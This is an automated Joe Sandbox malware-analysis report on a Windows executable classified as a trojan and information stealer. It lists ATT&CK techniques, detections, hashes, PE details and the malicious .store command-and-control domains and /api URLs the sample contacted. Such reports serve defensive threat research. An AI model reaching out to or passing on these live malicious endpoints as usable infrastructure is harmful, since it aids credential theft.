              PowerShell              		Boot or Logon Initialization Scripts1
              DLL Side-Loading              		1
              Process Injection              		LSASS Memory34
              Virtualization/Sandbox Evasion              		Remote Desktop Protocol41
              Data from Local System              		2
              Non-Application Layer Protocol              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information              		Security Account Manager2
              Process Discovery              		SMB/Windows Admin SharesData from Network Shared Drive113
              Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
              Obfuscated Files or Information              		NTDS11
              File and Directory Discovery              		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
              Software Packing              		LSA Secrets223
              System Information Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading              		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              file.exe39%ReversingLabsWin32.Trojan.Generic
              file.exe100%AviraTR/Crypt.TPM.Gen
              file.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
              https://duckduckgo.com/ac/?q=0%URL Reputationsafe
              http://crl.microsoft0%URL Reputationsafe
              https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%URL Reputationsafe
              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
              http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
              https://www.ecosia.org/newtab/0%URL Reputationsafe
              https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
              https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
              https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%URL Reputationsafe
              http://x1.c.lencr.org/00%URL Reputationsafe
              http://x1.i.lencr.org/00%URL Reputationsafe
              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
              http://crt.rootca1.amazontrust.com/rootca1.cer0?0%URL Reputationsafe
              https://support.mozilla.org/products/firefoxgro.all0%URL Reputationsafe
              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              necklacedmny.store
              		188.114.97.3
              		truetrue
                		unknown
                presticitpo.store
                		unknown
                		unknowntrue
                  		unknown
                  thumbystriw.store
                  		unknown
                  		unknowntrue
                    		unknown
                    crisiwarny.store
                    		unknown
                    		unknowntrue
                      		unknown
                      fadehairucw.store
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://necklacedmny.store/apitrue
                          		unknown
                          presticitpo.storetrue
                            		unknown
                            scriptyprefej.storetrue
                              		unknown
                              necklacedmny.storetrue
                                		unknown
                                fadehairucw.storetrue
                                  		unknown
                                  navygenerayk.storetrue
                                    		unknown
                                    founpiuer.storetrue
                                      		unknown
                                      thumbystriw.storetrue
                                        		unknown
                                        crisiwarny.storetrue
                                          		unknown

                                          URLs from Memory and Binaries

                                          NameSourceMaliciousAntivirus DetectionReputation
                                          https://duckduckgo.com/chrome_newtabfile.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://necklacedmny.store/7file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://duckduckgo.com/ac/?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            https://necklacedmny.store/apiBfile.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202292935.0000000001450000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183317892.000000000144F000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              https://necklacedmny.store/apitefile.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icofile.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://crl.microsoftfile.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2202261431.0000000001421000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYifile.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.file.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://ocsp.rootca1.amazontrust.com0:file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://www.ecosia.org/newtab/file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://necklacedmny.store//file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://necklacedmny.store/apiIfile.exe, 00000000.00000002.2206720217.0000000001454000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          https://ac.ecosia.org/autocomplete?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://necklacedmny.store/apirHfile.exe, 00000000.00000003.2153539401.0000000001429000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgfile.exe, 00000000.00000003.2153355585.0000000005C15000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://necklacedmny.store/apibfile.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://necklacedmny.store/file.exe, file.exe, 00000000.00000003.2081624288.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126457458.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2176681521.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153793686.0000000001432000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2128973004.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206362809.00000000013EF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2126105987.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2206644347.0000000001434000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://x1.c.lencr.org/0file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://x1.i.lencr.org/0file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchfile.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000000.00000003.2126808526.0000000005D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://necklacedmny.store/apirXfile.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://necklacedmny.store/jpfile.exe, 00000000.00000002.2206362809.000000000136E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://necklacedmny.store/apis7file.exe, 00000000.00000002.2206362809.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://necklacedmny.store/apimfile.exe, 00000000.00000003.2106682597.000000000143A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106662515.0000000001437000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://support.mozilla.org/products/firefoxgro.allfile.exe, 00000000.00000003.2129000627.0000000005F35000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000000.00000003.2084515085.0000000005C4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084897048.0000000005C4A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2084628457.0000000005C4A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://necklacedmny.store/Ofile.exe, 00000000.00000003.2183400496.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153443580.0000000001431000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2106754751.0000000001431000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://necklacedmny.store/apikfile.exe, 00000000.00000003.2153873095.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154414134.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157239046.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156236448.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2155720184.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2157740634.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2153539401.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2154907137.00000000013CE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2156790666.00000000013CE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		unknown

                                                                            World Map of Contacted IPs

                                                                            • No. of IPs < 25%
                                                                            • 25% < No. of IPs < 50%
                                                                            • 50% < No. of IPs < 75%
                                                                            • 75% < No. of IPs

                                                                            Public IPs

                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                            188.114.97.3
                                                                            		necklacedmny.storeEuropean Union
                                                                            		13335CLOUDFLARENETUStrue

                                                                            General Information

                                                                            Joe Sandbox version:41.0.0 Charoite
                                                                            Analysis ID:1546270
                                                                            Start date and time:2024-10-31 17:25:09 +01:00
                                                                            Joe Sandbox product:CloudBasic
                                                                            Overall analysis duration:0h 5m 22s
                                                                            Hypervisor based Inspection enabled:false
                                                                            Report type:full
                                                                            Cookbook file name:default.jbs
                                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                            Number of analysed new started processes analysed:4
                                                                            Number of new started drivers analysed:0
                                                                            Number of existing processes analysed:0
                                                                            Number of existing drivers analysed:0
                                                                            Number of injected processes analysed:0
                                                                            Technologies:
                                                                            • HCA enabled
                                                                            • EGA enabled
                                                                            • AMSI enabled
                                                                            Analysis Mode:default
                                                                            Analysis stop reason:Timeout
                                                                            Sample name:file.exe
                                                                            Detection:MAL
                                                                            Classification:mal100.troj.spyw.evad.winEXE@1/0@5/1
                                                                            EGA Information:Failed
                                                                            HCA Information:
                                                                            • Successful, ratio: 100%
                                                                            • Number of executed functions: 0
                                                                            • Number of non-executed functions: 1
                                                                            Cookbook Comments:
                                                                            • Found application associated with file extension: .exe

                                                                            Warnings

                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                            • Execution Graph export aborted for target file.exe, PID 1532 because there are no executed function
                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                            • VT rate limit hit for: file.exe

                                                                            Simulations

                                                                            Behavior and APIs

                                                                            TimeTypeDescription
                                                                            12:26:01API Interceptor10x Sleep call for process: file.exe modified

                                                                            Joe Sandbox View / Context

                                                                            IPs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            188.114.97.318in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                            • www.timizoasisey.shop/3p0l/
                                                                            lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/alpha2/five/fre.php
                                                                            Comprobante de pago.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                            • paste.ee/d/vdlzo
                                                                            Purchase_Order_pdf.exeGet hashmaliciousFormBookBrowse
                                                                            • www.bayarcepat19.click/g48c/
                                                                            zxalphamn.docGet hashmaliciousLokibotBrowse
                                                                            • touxzw.ir/alpha2/five/fre.php
                                                                            rPO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                            • www.launchdreamidea.xyz/2b9b/
                                                                            rPO_28102400.exeGet hashmaliciousLokibotBrowse
                                                                            • ghcopz.shop/ClarkB/PWS/fre.php
                                                                            PbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            • windowsxp.top/ExternaltoPhppollcpuupdateTrafficpublic.php
                                                                            SR3JZpolPo.exeGet hashmaliciousJohnWalkerTexasLoaderBrowse
                                                                            • xilloolli.com/api.php?status=1&wallets=0&av=1
                                                                            5Z1WFRMTOXRH6X21Z8NU8.exeGet hashmaliciousUnknownBrowse
                                                                            • artvisions-autoinsider.com/8bkjdSdfjCe/index.php

                                                                            Domains

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            necklacedmny.storefile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.96.3

                                                                            ASNs

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            CLOUDFLARENETUSfile.exeGet hashmaliciousNetSupport RATBrowse
                                                                            • 172.67.68.212
                                                                            rMT103_126021720924.exeGet hashmaliciousAgentTeslaBrowse
                                                                            • 104.26.12.205
                                                                            file.exeGet hashmaliciousNetSupport RATBrowse
                                                                            • 104.26.1.231
                                                                            Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.emlGet hashmaliciousUnknownBrowse
                                                                            • 104.18.36.155
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                            • 188.114.96.3
                                                                            https://t.ly/4Nq2xGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                            • 104.20.6.133
                                                                            INVOICE ATTACHMENT.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                            • 188.114.96.3
                                                                            SilverSEAL Corporation -RFQ_RFP_FSR Proposal.pdfGet hashmaliciousPhisherBrowse
                                                                            • 188.114.96.3
                                                                            Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                            • 188.114.97.3
                                                                            https://my.toruftuiov.com/a43a39c3-796e-468c-aae4-b83c862e0918Get hashmaliciousUnknownBrowse
                                                                            • 104.16.79.73

                                                                            JA3 Fingerprints

                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                            a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XWormBrowse
                                                                            • 188.114.97.3
                                                                            a.htaGet hashmaliciousDarkComet, DarkTortilla, NeshtaBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            Set-Up.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            Loader.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                            • 188.114.97.3
                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                            • 188.114.97.3

                                                                            Dropped Files

                                                                            No context

                                                                            Created / dropped Files

                                                                            No created / dropped files found

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):6.535284090193369
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:file.exe
                                                                            File size:3'022'848 bytes
                                                                            MD5:55bfaa52fb91ccaa609fda3e4ba384f1
                                                                            SHA1:82e95791abe38fd20575fb1a92d9a51030012f61
                                                                            SHA256:8461b98ede75eee3c04396a1600422e47a21eb3d575ec02b3a913e66dbda3749
                                                                            SHA512:097c7aa785377092f632a6273bc9961791cc239e8ec75b932076f2d4f143d6475ec7430de146878f9c44066726a2478371d73365e337954bac054e338947a3fb
                                                                            SSDEEP:49152:Zq7bXIsnOEbQ9lKLzngSCPy86+ucZv4EurqRksC:wXIsbbQHKLzngSW6vq4Euriks
                                                                            TLSH:50E54A91A40972CFD0BA53B59837CE825D6D03F947250CC3986DB67A7E7BCC229B5C28
                                                                            File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...S..g.................J...........01...........@..........................`1...........@.................................T...h..

                                                                            File Icon

                                                                            Icon Hash:00928e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x713000
                                                                            Entrypoint Section:.taggant
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                            Time Stamp:0x6715D353 [Mon Oct 21 04:06:43 2024 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            jmp 00007F65E45F5D0Ah
                                                                            paddd mm5, qword ptr [00000000h]
                                                                            add cl, ch
                                                                            add byte ptr [eax], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [edi], al
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], dh
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [edi], bl
                                                                            add byte ptr [eax+000000FEh], ah
                                                                            add byte ptr [edx], ah
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], cl
                                                                            add byte ptr [eax], 00000000h
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            adc byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al
                                                                            push es
                                                                            or al, byte ptr [eax]
                                                                            add byte ptr [eax], al
                                                                            add byte ptr [eax], al

                                                                            Data Directories

                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x5a0540x68.idata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x590000x340.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
